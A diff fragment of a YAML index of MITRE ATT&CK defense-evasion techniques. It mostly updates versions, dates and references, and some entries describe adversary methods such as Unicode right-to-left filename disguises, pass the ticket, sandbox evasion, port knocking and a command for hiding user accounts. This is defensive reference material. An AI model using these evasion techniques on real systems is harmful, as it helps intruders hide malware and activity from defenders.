       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -6879,7 +7002,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -6956,8 +7078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -7082,14 +7199,13 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -7116,7 +7233,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1036.004:
@@ -7225,7 +7342,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests: []
   T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests: []
   T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests: []
   T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests: []
   T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7913,6 +7989,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -7989,7 +8094,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8027,68 +8132,72 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests: []
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -8146,7 +8255,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests: []
   T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
